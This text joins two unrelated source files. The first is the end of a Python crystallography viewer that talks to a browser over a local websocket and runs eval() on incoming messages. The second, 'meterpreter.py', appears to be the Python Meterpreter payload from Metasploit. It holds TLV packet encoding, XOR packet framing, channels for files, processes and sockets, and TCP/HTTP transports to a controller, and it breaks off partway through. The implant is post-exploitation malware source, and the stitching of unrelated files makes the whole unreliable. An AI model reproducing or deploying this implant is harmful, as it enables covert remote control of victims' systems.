mysocket.send( 'Ready ' + pagename );
}
catch(err)
{
mysocket.send('error: ' + err.stack );
/*
msg = "";
for(var n=0; n<Object.getOwnPropertyNames(self).length; n++)
{
someKey = Object.getOwnPropertyNames(self)[n];
// We check if this key exists in the obj
var thisval = self[someKey];
if (Object(thisval) !== thisval) // only interested in primitive values, not objects
{
//varname = Object.keys({thisval:0} )[0]
msg = msg.concat( someKey + ': ' + String(self[someKey]) + '\\n');
}
}
mysocket.send('Variable values: ' + msg );
*/
}
};
""" % (self.__module__, self.__module__, axisfuncstr, self.camera_type, spherebufferstr, \
negativeradiistr, colourgradstrs, colourlabel, fomlabel, cntbin)
if self.jscriptfname:
with open( self.jscriptfname, "w") as f:
f.write( self.NGLscriptstr )
self.ReloadNGL()
self.sceneisdirty = False
def OnConnectWebsocketClient(self, client, server):
#if not self.websockclient:
self.websockclient = client
self.mprint( "Browser connected:" + str( self.websockclient ) )
#else:
# self.mprint( "Unexpected browser connection was rejected" )
def OnWebsocketClientMessage(self, client, server, message):
try:
verb = self.verbose
if message != "":
if "Error:" in message:
verb = True
self.mprint( message, verb)
self.lastmsg = message
if "Current vieworientation:" in message:
# The NGL.Matrix4 with the orientation is a list of floats.
self.viewmtrxelms = message[ message.find("\n") + 1: ]
sleep(0.2)
self.mprint( "Reorienting client after refresh:" + str( self.websockclient ) )
if not self.isnewfile:
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
self.msgqueue.append( ("ReOrient", self.viewmtrxelms) )
self.isnewfile = False
if "tooltip_id:" in message:
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
sym_id = eval(message.split("tooltip_id:")[1])[0]
id = eval(message.split("tooltip_id:")[1])[1]
is_friedel_mate = eval(message.split("tooltip_id:")[1])[2]
rotmx = None
if sym_id >= 0:
rotmx = self.symops[sym_id].r()
hkls = self.scene.indices
#ttip = self.tooltipstringsdict[hkls[id]]
self.mprint("tooltip for : " + str(hkls[id]))
if not is_friedel_mate:
#ttip = self.GetTooltipOnTheFly(hkls[id], rotmx)
ttip = self.GetTooltipOnTheFly(id, rotmx)
else:
# if id >= len(hkls) these are the reflections added as Friedel mates by the
# "if (anoexp)" branch in the javascript code above
id = id % len(hkls)
ttip = "id: %d" %id
#ttip = self.GetTooltipOnTheFly(hkls[id], rotmx, anomalous=True)
ttip = self.GetTooltipOnTheFly(id, rotmx, anomalous=True)
self.SendWebSockMsg("ShowTooltip", ttip)
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
except Exception as e:
self.mprint( to_str(e) + "\n" + traceback.format_exc(limit=10))
def WebBrowserMsgQueue(self):
try:
while True:
sleep(0.5)
if len(self.msgqueue):
pendingmessagetype, pendingmessage = self.msgqueue[0]
self.SendWebSockMsg(pendingmessagetype, pendingmessage)
self.msgqueue.remove( self.msgqueue[0] )
# If the html content is huge the browser can be unresponsive until it has finished
# reading it, which may crash this thread. Keep restarting the thread until the
# browser is ready.
except Exception as e:
self.mprint( str(e) + ", Restarting WebBrowserMsgQueue")
self.WebBrowserMsgQueue()
def StartWebsocket(self):
self.server = WebsocketServer(7894, host='127.0.0.1')
if not self.server:
raise Sorry("Could not connect socket to web browser")
self.server.set_fn_new_client(self.OnConnectWebsocketClient)
self.server.set_fn_message_received(self.OnWebsocketClientMessage)
self.wst = threading.Thread(target=self.server.run_forever)
self.wst.daemon = True
self.wst.start()
self.msgqueuethrd = threading.Thread(target = self.WebBrowserMsgQueue )
self.msgqueuethrd.daemon = True
self.msgqueuethrd.start()
def SendWebSockMsg(self, msgtype, msg=""):
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
#print "self.server.clients: ", self.server.clients
#print "self.websockclient: ",
message = u"" + msgtype + self.msgdelim + msg
if self.websockclient:
while not ("Ready" in self.lastmsg or "tooltip_id" in self.lastmsg):
sleep(0.5)
#self.lastmsg = ""
self.server.send_message(self.websockclient, message )
else:
self.OpenBrowser()
def SetOpacity(self, bin, alpha):
if bin > self.nbin:
self.mprint( "There are only %d bins of data present" %self.nbin, True )
return
msg = "%d, %f" %(bin, alpha)
self.SendWebSockMsg("alpha", msg)
def RedrawNGL(self):
#self.SendWebSockMsg("Redraw")
self.msgqueue.append( ("Redraw", "") )
def ReloadNGL(self): # expensive as javascript may be several Mbytes large
self.mprint("Rendering JavaScript...", True)
#self.SendWebSockMsg("Reload")
self.msgqueue.append( ("Reload", "") )
def OpenBrowser(self):
if not self.browserisopen:
NGLlibpath = libtbx.env.under_root(os.path.join("modules","cctbx_project","crys3d","hklview","ngl.js") )
htmlstr = self.hklhtml %(NGLlibpath, os.path.abspath( self.jscriptfname))
htmlstr += self.htmldiv
with open(self.hklfname, "w") as f:
f.write( htmlstr )
self.url = "file://" + os.path.abspath( self.hklfname )
self.mprint( "Writing %s and connecting to its websocket client" %self.hklfname)
if self.UseOSBrowser:
webbrowser.open(self.url, new=1)
self.isnewfile = False
self.browserisopen = True
def ExpandInBrowser(self, P1=True, friedel_mate=True):
retmsg = "Not expanding in browser"
if self.sceneisdirty:
return retmsg
uc = self.miller_array.unit_cell()
OrtMx = matrix.sqr( uc.orthogonalization_matrix())
InvMx = OrtMx.inverse()
msgtype = "Expand"
msg = ""
unique_rot_ops = []
if P1:
msgtype += "P1"
unique_rot_ops = self.symops[ 0 : self.sg.order_p() ]
retmsg = "expanding to P1 in browser"
else:
unique_rot_ops = [ self.symops[0] ] # first one is the identity matrix
if friedel_mate:
msgtype += "Friedel"
retmsg = "expanding Friedel mates in browser"
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
for i, symop in enumerate(unique_rot_ops):
RotMx = matrix.sqr( symop.r().as_double())
ortrot = (OrtMx * RotMx * InvMx).as_mat3()
if RotMx.is_r3_identity_matrix():
# avoid machine precision rounding errors converting 1.0 to 0.99999999..
ortrot = (1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 1.0)
str_rot = str(ortrot)
str_rot = str_rot.replace("(", "")
str_rot = str_rot.replace(")", "")
msg += str_rot + "\n"
#self.SendWebSockMsg(msgtype, msg)
self.msgqueue.append( (msgtype, msg) )
return retmsg
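# Illustrative note: for the identity operator the loop above appends the line
# "1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 1.0" to msg, and the browser-side
# "Expand" handler splits each such line into the 9 floats of an NGL.Matrix3
# that is then applied to the reflection positions.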
def TestNewFunction(self):
self.SendWebSockMsg("Testing")
"""
# python2 code
from websocket_server import WebsocketServer
import threading, math
from time import sleep
nc = {}
def new_client(client, server):
nc = client
print "got a new client:", nc
def on_message(client, server, message):
print message
websocket.enableTrace(True)
server = WebsocketServer(7894, host='127.0.0.1')
server.set_fn_new_client(new_client)
server.set_fn_message_received(on_message)
wst = threading.Thread(target=server.run_forever)
wst.daemon = True
wst.start()
def LoopSendMessages():
x = 0.0
i=0
while server.clients:
nc = server.clients[0]
x += 0.2
alpha = (math.cos(x) +1.0 )/2.0
msg = u"alpha, 2, %f" %alpha
server.send_message(server.clients[0], msg )
r = (math.cos(x) +1.0 )/2.0
g = (math.cos(x+1) +1.0 )/2.0
b = (math.cos(x+2) +1.0 )/2.0
msg = u"colour, 1, %d, %f, %f, %f" %(i,r,g,b)
server.send_message(server.clients[0], msg )
sleep(0.2)
"""
"""
# python3 code
import asyncio
import math
import websockets
async def time(websocket, path):
x = 0
for i in range(1000):
x += 0.2
alpha = (math.cos(x) +1.0 )/2.0
msg = u"alpha, 2, %f" %alpha
await websocket.send( msg )
r = (math.cos(x) +1.0 )/2.0
g = (math.cos(x+1) +1.0 )/2.0
b = (math.cos(x+2) +1.0 )/2.0
msg = u"colour, 1, %d, %f, %f, %f" %(i,r,g,b)
await websocket.send( msg )
message = await websocket.recv()
print( message)
await asyncio.sleep(0.2)
start_server = websockets.serve(time, '127.0.0.1', 7894)
asyncio.get_event_loop().run_until_complete(start_server)
asyncio.get_event_loop().run_forever()
"""
|
meterpreter.py
|
#!/usr/bin/python
import binascii
import code
import os
import platform
import random
import re
import select
import socket
import struct
import subprocess
import sys
import threading
import time
import traceback
try:
import ctypes
except ImportError:
has_windll = False
else:
has_windll = hasattr(ctypes, 'windll')
try:
urllib_imports = ['ProxyHandler', 'Request', 'build_opener', 'install_opener', 'urlopen']
if sys.version_info[0] < 3:
urllib = __import__('urllib2', fromlist=urllib_imports)
else:
urllib = __import__('urllib.request', fromlist=urllib_imports)
except ImportError:
has_urllib = False
else:
has_urllib = True
if sys.version_info[0] < 3:
is_str = lambda obj: issubclass(obj.__class__, str)
is_bytes = lambda obj: issubclass(obj.__class__, str)
bytes = lambda *args: str(*args[:1])
NULL_BYTE = '\x00'
unicode = lambda x: (x.decode('UTF-8') if isinstance(x, str) else x)
else:
if isinstance(__builtins__, dict):
is_str = lambda obj: issubclass(obj.__class__, __builtins__['str'])
str = lambda x: __builtins__['str'](x, *(() if isinstance(x, (float, int)) else ('UTF-8',)))
else:
is_str = lambda obj: issubclass(obj.__class__, __builtins__.str)
str = lambda x: __builtins__.str(x, *(() if isinstance(x, (float, int)) else ('UTF-8',)))
is_bytes = lambda obj: issubclass(obj.__class__, bytes)
NULL_BYTE = bytes('\x00', 'UTF-8')
long = int
unicode = lambda x: (x.decode('UTF-8') if isinstance(x, bytes) else x)
# reseed the random generator.
random.seed()
#
# Constants
#
# these values will be patched, DO NOT CHANGE THEM
DEBUGGING = False
TRY_TO_FORK = True
HTTP_CONNECTION_URL = None
HTTP_PROXY = None
HTTP_USER_AGENT = None
HTTP_COOKIE = None
HTTP_HOST = None
HTTP_REFERER = None
PAYLOAD_UUID = ''
SESSION_GUID = ''
SESSION_COMMUNICATION_TIMEOUT = 300
SESSION_EXPIRATION_TIMEOUT = 604800
SESSION_RETRY_TOTAL = 3600
SESSION_RETRY_WAIT = 10
PACKET_TYPE_REQUEST = 0
PACKET_TYPE_RESPONSE = 1
PACKET_TYPE_PLAIN_REQUEST = 10
PACKET_TYPE_PLAIN_RESPONSE = 11
ERROR_SUCCESS = 0
# not defined in original C implementation
ERROR_FAILURE = 1
ERROR_FAILURE_PYTHON = 2
ERROR_FAILURE_WINDOWS = 3
CHANNEL_CLASS_BUFFERED = 0
CHANNEL_CLASS_STREAM = 1
CHANNEL_CLASS_DATAGRAM = 2
CHANNEL_CLASS_POOL = 3
#
# TLV Meta Types
#
TLV_META_TYPE_NONE = ( 0 )
TLV_META_TYPE_STRING = (1 << 16)
TLV_META_TYPE_UINT = (1 << 17)
TLV_META_TYPE_RAW = (1 << 18)
TLV_META_TYPE_BOOL = (1 << 19)
TLV_META_TYPE_QWORD = (1 << 20)
TLV_META_TYPE_COMPRESSED = (1 << 29)
TLV_META_TYPE_GROUP = (1 << 30)
TLV_META_TYPE_COMPLEX = (1 << 31)
# not defined in original
TLV_META_TYPE_MASK = (1<<31)+(1<<30)+(1<<29)+(1<<19)+(1<<18)+(1<<17)+(1<<16)
#
# TLV base starting points
#
TLV_RESERVED = 0
TLV_EXTENSIONS = 20000
TLV_USER = 40000
TLV_TEMP = 60000
#
# TLV Specific Types
#
TLV_TYPE_ANY = TLV_META_TYPE_NONE | 0
TLV_TYPE_METHOD = TLV_META_TYPE_STRING | 1
TLV_TYPE_REQUEST_ID = TLV_META_TYPE_STRING | 2
TLV_TYPE_EXCEPTION = TLV_META_TYPE_GROUP | 3
TLV_TYPE_RESULT = TLV_META_TYPE_UINT | 4
TLV_TYPE_STRING = TLV_META_TYPE_STRING | 10
TLV_TYPE_UINT = TLV_META_TYPE_UINT | 11
TLV_TYPE_BOOL = TLV_META_TYPE_BOOL | 12
TLV_TYPE_LENGTH = TLV_META_TYPE_UINT | 25
TLV_TYPE_DATA = TLV_META_TYPE_RAW | 26
TLV_TYPE_FLAGS = TLV_META_TYPE_UINT | 27
TLV_TYPE_CHANNEL_ID = TLV_META_TYPE_UINT | 50
TLV_TYPE_CHANNEL_TYPE = TLV_META_TYPE_STRING | 51
TLV_TYPE_CHANNEL_DATA = TLV_META_TYPE_RAW | 52
TLV_TYPE_CHANNEL_DATA_GROUP = TLV_META_TYPE_GROUP | 53
TLV_TYPE_CHANNEL_CLASS = TLV_META_TYPE_UINT | 54
TLV_TYPE_CHANNEL_PARENTID = TLV_META_TYPE_UINT | 55
TLV_TYPE_SEEK_WHENCE = TLV_META_TYPE_UINT | 70
TLV_TYPE_SEEK_OFFSET = TLV_META_TYPE_UINT | 71
TLV_TYPE_SEEK_POS = TLV_META_TYPE_UINT | 72
TLV_TYPE_EXCEPTION_CODE = TLV_META_TYPE_UINT | 300
TLV_TYPE_EXCEPTION_STRING = TLV_META_TYPE_STRING | 301
TLV_TYPE_LIBRARY_PATH = TLV_META_TYPE_STRING | 400
TLV_TYPE_TARGET_PATH = TLV_META_TYPE_STRING | 401
TLV_TYPE_TRANS_TYPE = TLV_META_TYPE_UINT | 430
TLV_TYPE_TRANS_URL = TLV_META_TYPE_STRING | 431
TLV_TYPE_TRANS_UA = TLV_META_TYPE_STRING | 432
TLV_TYPE_TRANS_COMM_TIMEOUT = TLV_META_TYPE_UINT | 433
TLV_TYPE_TRANS_SESSION_EXP = TLV_META_TYPE_UINT | 434
TLV_TYPE_TRANS_CERT_HASH = TLV_META_TYPE_RAW | 435
TLV_TYPE_TRANS_PROXY_HOST = TLV_META_TYPE_STRING | 436
TLV_TYPE_TRANS_PROXY_USER = TLV_META_TYPE_STRING | 437
TLV_TYPE_TRANS_PROXY_PASS = TLV_META_TYPE_STRING | 438
TLV_TYPE_TRANS_RETRY_TOTAL = TLV_META_TYPE_UINT | 439
TLV_TYPE_TRANS_RETRY_WAIT = TLV_META_TYPE_UINT | 440
TLV_TYPE_TRANS_HEADERS = TLV_META_TYPE_STRING | 441
TLV_TYPE_TRANS_GROUP = TLV_META_TYPE_GROUP | 442
TLV_TYPE_MACHINE_ID = TLV_META_TYPE_STRING | 460
TLV_TYPE_UUID = TLV_META_TYPE_RAW | 461
TLV_TYPE_SESSION_GUID = TLV_META_TYPE_RAW | 462
TLV_TYPE_PEER_HOST = TLV_META_TYPE_STRING | 1500
TLV_TYPE_PEER_PORT = TLV_META_TYPE_UINT | 1501
TLV_TYPE_LOCAL_HOST = TLV_META_TYPE_STRING | 1502
TLV_TYPE_LOCAL_PORT = TLV_META_TYPE_UINT | 1503
EXPORTED_SYMBOLS = {}
EXPORTED_SYMBOLS['DEBUGGING'] = DEBUGGING
# Packet header sizes
ENC_NONE = 0
PACKET_XOR_KEY_SIZE = 4
PACKET_SESSION_GUID_SIZE = 16
PACKET_ENCRYPT_FLAG_SIZE = 4
PACKET_LENGTH_SIZE = 4
PACKET_TYPE_SIZE = 4
PACKET_LENGTH_OFF = (PACKET_XOR_KEY_SIZE + PACKET_SESSION_GUID_SIZE +
PACKET_ENCRYPT_FLAG_SIZE)
PACKET_HEADER_SIZE = (PACKET_XOR_KEY_SIZE + PACKET_SESSION_GUID_SIZE +
PACKET_ENCRYPT_FLAG_SIZE + PACKET_LENGTH_SIZE + PACKET_TYPE_SIZE)
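# Layout implied by the sizes above (offsets in bytes):
#   [xor key: 4][session guid: 16][encrypt flag: 4][length: 4][type: 4]
# hence PACKET_LENGTH_OFF == 24 and PACKET_HEADER_SIZE == 32.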
class SYSTEM_INFO(ctypes.Structure):
_fields_ = [("wProcessorArchitecture", ctypes.c_uint16),
("wReserved", ctypes.c_uint16),
("dwPageSize", ctypes.c_uint32),
("lpMinimumApplicationAddress", ctypes.c_void_p),
("lpMaximumApplicationAddress", ctypes.c_void_p),
("dwActiveProcessorMask", ctypes.c_uint32),
("dwNumberOfProcessors", ctypes.c_uint32),
("dwProcessorType", ctypes.c_uint32),
("dwAllocationGranularity", ctypes.c_uint32),
("wProcessorLevel", ctypes.c_uint16),
("wProcessorRevision", ctypes.c_uint16)]
def rand_xor_key():
return tuple(random.randint(1, 255) for _ in range(4))
def xor_bytes(key, data):
if sys.version_info[0] < 3:
dexored = ''.join(chr(ord(data[i]) ^ key[i % len(key)]) for i in range(len(data)))
else:
dexored = bytes(data[i] ^ key[i % len(key)] for i in range(len(data)))
return dexored
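# Note: XOR with the same repeating 4-byte key is its own inverse, so for any key
# returned by rand_xor_key(), xor_bytes(key, xor_bytes(key, data)) == data; this is
# what lets decrypt_packet() below recover packets framed by encrypt_packet().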
def export(symbol):
EXPORTED_SYMBOLS[symbol.__name__] = symbol
return symbol
def generate_request_id():
chars = 'abcdefghijklmnopqrstuvwxyz'
return ''.join(random.choice(chars) for x in range(32))
@export
def crc16(data):
poly = 0x1021
reg = 0x0000
if is_str(data):
data = list(map(ord, data))
elif is_bytes(data):
data = list(data)
data.append(0)
data.append(0)
for byte in data:
mask = 0x80
while mask > 0:
reg <<= 1
if byte & mask:
reg += 1
mask >>= 1
if reg > 0xffff:
reg &= 0xffff
reg ^= poly
return reg
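# Example of how this checksum is used: error_result() below compares
# crc16(exception.__class__.__name__) against 0x4cb2, the value it documents for
# the name 'WindowsError', to decide whether to report a Windows error code.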
@export
def debug_print(msg):
if DEBUGGING:
print(msg)
@export
def debug_traceback(msg=None):
if DEBUGGING:
if msg:
print(msg)
traceback.print_exc(file=sys.stderr)
@export
def error_result(exception=None):
if not exception:
_, exception, _ = sys.exc_info()
exception_crc = crc16(exception.__class__.__name__)
if exception_crc == 0x4cb2: # WindowsError
return error_result_windows(exception.errno)
else:
result = ((exception_crc << 16) | ERROR_FAILURE_PYTHON)
return result
@export
def error_result_windows(error_number=None):
if not has_windll:
return ERROR_FAILURE
if error_number == None:
error_number = ctypes.windll.kernel32.GetLastError()
if error_number > 0xffff:
return ERROR_FAILURE
result = ((error_number << 16) | ERROR_FAILURE_WINDOWS)
return result
@export
def get_hdd_label():
for _, _, files in os.walk('/dev/disk/by-id/'):
for f in files:
for p in ['ata-', 'mb-']:
if f[:len(p)] == p:
return f[len(p):]
return ''
@export
def get_native_arch():
arch = get_system_arch()
if arch == 'x64' and ctypes.sizeof(ctypes.c_void_p) == 4:
arch = 'x86'
return arch
@export
def get_system_arch():
uname_info = platform.uname()
arch = uname_info[4]
if has_windll:
sysinfo = SYSTEM_INFO()
ctypes.windll.kernel32.GetNativeSystemInfo(ctypes.byref(sysinfo))
values = {0:'x86', 5:'armle', 6:'IA64', 9:'x64'}
arch = values.get(sysinfo.wProcessorArchitecture, uname_info[4])
if arch == 'x86_64':
arch = 'x64'
return arch
@export
def inet_pton(family, address):
if family == socket.AF_INET6 and '%' in address:
address = address.split('%', 1)[0]
if hasattr(socket, 'inet_pton'):
return socket.inet_pton(family, address)
elif has_windll:
WSAStringToAddress = ctypes.windll.ws2_32.WSAStringToAddressA
lpAddress = (ctypes.c_ubyte * 28)()
lpAddressLength = ctypes.c_int(ctypes.sizeof(lpAddress))
if WSAStringToAddress(address, family, None, ctypes.byref(lpAddress), ctypes.byref(lpAddressLength)) != 0:
raise Exception('WSAStringToAddress failed')
if family == socket.AF_INET:
return ''.join(map(chr, lpAddress[4:8]))
elif family == socket.AF_INET6:
return ''.join(map(chr, lpAddress[8:24]))
raise Exception('no suitable inet_pton functionality is available')
@export
def packet_enum_tlvs(pkt, tlv_type=None):
offset = 0
while offset < len(pkt):
tlv = struct.unpack('>II', pkt[offset:offset + 8])
if tlv_type is None or (tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type:
val = pkt[offset + 8:(offset + 8 + (tlv[0] - 8))]
if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
val = str(val.split(NULL_BYTE, 1)[0])
elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
val = struct.unpack('>I', val)[0]
elif (tlv[1] & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD:
val = struct.unpack('>Q', val)[0]
elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
val = bool(struct.unpack('b', val)[0])
elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
pass
yield {'type': tlv[1], 'length': tlv[0], 'value': val}
offset += tlv[0]
# the generator simply ends when the while loop above runs out of TLVs; raising
# StopIteration explicitly would become a RuntimeError under PEP 479 (Python 3.7+)
@export
def packet_get_tlv(pkt, tlv_type):
try:
tlv = list(packet_enum_tlvs(pkt, tlv_type))[0]
except IndexError:
return {}
return tlv
@export
def tlv_pack(*args):
if len(args) == 2:
tlv = {'type':args[0], 'value':args[1]}
else:
tlv = args[0]
data = ''
value = tlv['value']
if (tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
if isinstance(value, float):
value = int(round(value))
data = struct.pack('>III', 12, tlv['type'], value)
elif (tlv['type'] & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD:
data = struct.pack('>IIQ', 16, tlv['type'], value)
elif (tlv['type'] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
data = struct.pack('>II', 9, tlv['type']) + bytes(chr(int(bool(value))), 'UTF-8')
else:
if sys.version_info[0] < 3 and value.__class__.__name__ == 'unicode':
value = value.encode('UTF-8')
elif not is_bytes(value):
value = bytes(value, 'UTF-8')
if (tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
data = struct.pack('>II', 8 + len(value) + 1, tlv['type']) + value + NULL_BYTE
elif (tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
data = struct.pack('>II', 8 + len(value), tlv['type']) + value
elif (tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP:
data = struct.pack('>II', 8 + len(value), tlv['type']) + value
elif (tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX:
data = struct.pack('>II', 8 + len(value), tlv['type']) + value
return data
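# Worked example from the UINT branch above: tlv_pack(TLV_TYPE_RESULT, 0) packs
# struct.pack('>III', 12, TLV_TYPE_RESULT, 0), i.e. a 12-byte record made of a
# 4-byte length, 4-byte type and 4-byte value.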
@export
def tlv_pack_request(method, parts=None):
pkt = struct.pack('>I', PACKET_TYPE_REQUEST)
pkt += tlv_pack(TLV_TYPE_METHOD, method)
pkt += tlv_pack(TLV_TYPE_UUID, binascii.a2b_hex(bytes(PAYLOAD_UUID, 'UTF-8')))
pkt += tlv_pack(TLV_TYPE_REQUEST_ID, generate_request_id())
parts = parts or []
for part in parts:
pkt += tlv_pack(part['type'], part['value'])
return pkt
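# Usage sketch: PythonMeterpreter.run() further down builds its channel-output
# notification as tlv_pack_request('core_channel_write', parts), where parts carries
# TLV_TYPE_CHANNEL_ID, TLV_TYPE_CHANNEL_DATA and TLV_TYPE_LENGTH entries.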
#@export
class MeterpreterChannel(object):
def core_close(self, request, response):
self.close()
return ERROR_SUCCESS, response
def core_eof(self, request, response):
response += tlv_pack(TLV_TYPE_BOOL, self.eof())
return ERROR_SUCCESS, response
def core_read(self, request, response):
length = packet_get_tlv(request, TLV_TYPE_LENGTH)['value']
response += tlv_pack(TLV_TYPE_CHANNEL_DATA, self.read(length))
return ERROR_SUCCESS, response
def core_write(self, request, response):
channel_data = packet_get_tlv(request, TLV_TYPE_CHANNEL_DATA)['value']
response += tlv_pack(TLV_TYPE_LENGTH, self.write(channel_data))
return ERROR_SUCCESS, response
def close(self):
raise NotImplementedError()
def eof(self):
return False
def is_alive(self):
return True
def notify(self):
return None
def read(self, length):
raise NotImplementedError()
def write(self, data):
raise NotImplementedError()
#@export
class MeterpreterFile(MeterpreterChannel):
def __init__(self, file_obj):
self.file_obj = file_obj
super(MeterpreterFile, self).__init__()
def close(self):
self.file_obj.close()
def eof(self):
return self.file_obj.tell() >= os.fstat(self.file_obj.fileno()).st_size
def read(self, length):
return self.file_obj.read(length)
def write(self, data):
self.file_obj.write(data)
return len(data)
export(MeterpreterFile)
#@export
class MeterpreterProcess(MeterpreterChannel):
def __init__(self, proc_h):
self.proc_h = proc_h
super(MeterpreterProcess, self).__init__()
def close(self):
self.proc_h.kill()
def is_alive(self):
return self.proc_h.poll() is None
def read(self, length):
data = ''
stdout_reader = self.proc_h.stdout_reader
if stdout_reader.is_read_ready():
data = stdout_reader.read(length)
return data
def write(self, data):
self.proc_h.write(data)
return len(data)
export(MeterpreterProcess)
#@export
class MeterpreterSocket(MeterpreterChannel):
def __init__(self, sock):
self.sock = sock
self._is_alive = True
super(MeterpreterSocket, self).__init__()
def core_write(self, request, response):
try:
status, response = super(MeterpreterSocket, self).core_write(request, response)
except socket.error:
self.close()
self._is_alive = False
status = ERROR_FAILURE
return status, response
def close(self):
return self.sock.close()
def fileno(self):
return self.sock.fileno()
def is_alive(self):
return self._is_alive
def read(self, length):
return self.sock.recv(length)
def write(self, data):
return self.sock.send(data)
export(MeterpreterSocket)
#@export
class MeterpreterSocketTCPClient(MeterpreterSocket):
pass
export(MeterpreterSocketTCPClient)
#@export
class MeterpreterSocketTCPServer(MeterpreterSocket):
pass
export(MeterpreterSocketTCPServer)
#@export
class MeterpreterSocketUDPClient(MeterpreterSocket):
def __init__(self, sock, peer_address=None):
super(MeterpreterSocketUDPClient, self).__init__(sock)
self.peer_address = peer_address
def core_write(self, request, response):
peer_host = packet_get_tlv(request, TLV_TYPE_PEER_HOST).get('value')
peer_port = packet_get_tlv(request, TLV_TYPE_PEER_PORT).get('value')
if peer_host and peer_port:
peer_address = (peer_host, peer_port)
elif self.peer_address:
peer_address = self.peer_address
else:
raise RuntimeError('peer_host and peer_port must be specified with an unbound/unconnected UDP channel')
channel_data = packet_get_tlv(request, TLV_TYPE_CHANNEL_DATA)['value']
try:
length = self.sock.sendto(channel_data, peer_address)
except socket.error:
self.close()
self._is_alive = False
status = ERROR_FAILURE
else:
response += tlv_pack(TLV_TYPE_LENGTH, length)
status = ERROR_SUCCESS
return status, response
def read(self, length):
return self.sock.recvfrom(length)[0]
def write(self, data):
self.sock.sendto(data, self.peer_address)
export(MeterpreterSocketUDPClient)
class STDProcessBuffer(threading.Thread):
def __init__(self, std, is_alive):
threading.Thread.__init__(self)
self.std = std
self.is_alive = is_alive
self.data = bytes()
self.data_lock = threading.RLock()
def run(self):
for byte in iter(lambda: self.std.read(1), bytes()):
self.data_lock.acquire()
self.data += byte
self.data_lock.release()
def is_read_ready(self):
return len(self.data) != 0
def peek(self, l = None):
data = bytes()
self.data_lock.acquire()
if l == None:
data = self.data
else:
data = self.data[0:l]
self.data_lock.release()
return data
def read(self, l = None):
self.data_lock.acquire()
data = self.peek(l)
self.data = self.data[len(data):]
self.data_lock.release()
return data
#@export
class STDProcess(subprocess.Popen):
def __init__(self, *args, **kwargs):
debug_print('[*] starting process: ' + repr(args[0]))
subprocess.Popen.__init__(self, *args, **kwargs)
self.echo_protection = False
def is_alive(self):
return self.poll() is None
def start(self):
self.stdout_reader = STDProcessBuffer(self.stdout, self.is_alive)
self.stdout_reader.start()
self.stderr_reader = STDProcessBuffer(self.stderr, self.is_alive)
self.stderr_reader.start()
def write(self, channel_data):
length = self.stdin.write(channel_data)
self.stdin.flush()
if self.echo_protection:
end_time = time.time() + 0.5
out_data = bytes()
while (time.time() < end_time) and (out_data != channel_data):
if self.stdout_reader.is_read_ready():
out_data = self.stdout_reader.peek(len(channel_data))
if out_data == channel_data:
self.stdout_reader.read(len(channel_data))
return length
export(STDProcess)
class Transport(object):
def __init__(self):
self.communication_timeout = SESSION_COMMUNICATION_TIMEOUT
self.communication_last = 0
self.retry_total = SESSION_RETRY_TOTAL
self.retry_wait = SESSION_RETRY_WAIT
self.request_retire = False
def __repr__(self):
return "<{0} url='{1}' >".format(self.__class__.__name__, self.url)
@property
def communication_has_expired(self):
return self.communication_last + self.communication_timeout < time.time()
@property
def should_retire(self):
return self.communication_has_expired or self.request_retire
@staticmethod
def from_request(request):
url = packet_get_tlv(request, TLV_TYPE_TRANS_URL)['value']
if url.startswith('tcp'):
transport = TcpTransport(url)
elif url.startswith('http'):
proxy = packet_get_tlv(request, TLV_TYPE_TRANS_PROXY_HOST).get('value')
user_agent = packet_get_tlv(request, TLV_TYPE_TRANS_UA).get('value', HTTP_USER_AGENT)
http_headers = packet_get_tlv(request, TLV_TYPE_TRANS_HEADERS).get('value', None)
transport = HttpTransport(url, proxy=proxy, user_agent=user_agent)
if http_headers:
headers = {}
for h in http_headers.strip().split("\r\n"):
p = h.split(':')
headers[p[0].upper()] = ''.join(p[1:])  # p[1:0] is always empty; join the remainder of the header value
http_host = headers.get('HOST')
http_cookie = headers.get('COOKIE')
http_referer = headers.get('REFERER')
transport = HttpTransport(url, proxy=proxy, user_agent=user_agent, http_host=http_host,
http_cookie=http_cookie, http_referer=http_referer)
transport.communication_timeout = packet_get_tlv(request, TLV_TYPE_TRANS_COMM_TIMEOUT).get('value', SESSION_COMMUNICATION_TIMEOUT)
transport.retry_total = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_TOTAL).get('value', SESSION_RETRY_TOTAL)
transport.retry_wait = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_WAIT).get('value', SESSION_RETRY_WAIT)
return transport
def _activate(self):
return True
def activate(self):
end_time = time.time() + self.retry_total
while time.time() < end_time:
try:
activate_succeeded = self._activate()
except:
activate_succeeded = False
if activate_succeeded:
self.communication_last = time.time()
return True
time.sleep(self.retry_wait)
return False
def _deactivate(self):
return
def deactivate(self):
try:
self._deactivate()
except:
pass
self.communication_last = 0
return True
def decrypt_packet(self, pkt):
if pkt and len(pkt) > PACKET_HEADER_SIZE:
# We don't support AES encryption yet, so just do the normal
# XOR thing and move on
xor_key = struct.unpack('BBBB', pkt[:PACKET_XOR_KEY_SIZE])
raw = xor_bytes(xor_key, pkt)
return raw[PACKET_HEADER_SIZE:]
return None
def get_packet(self):
self.request_retire = False
try:
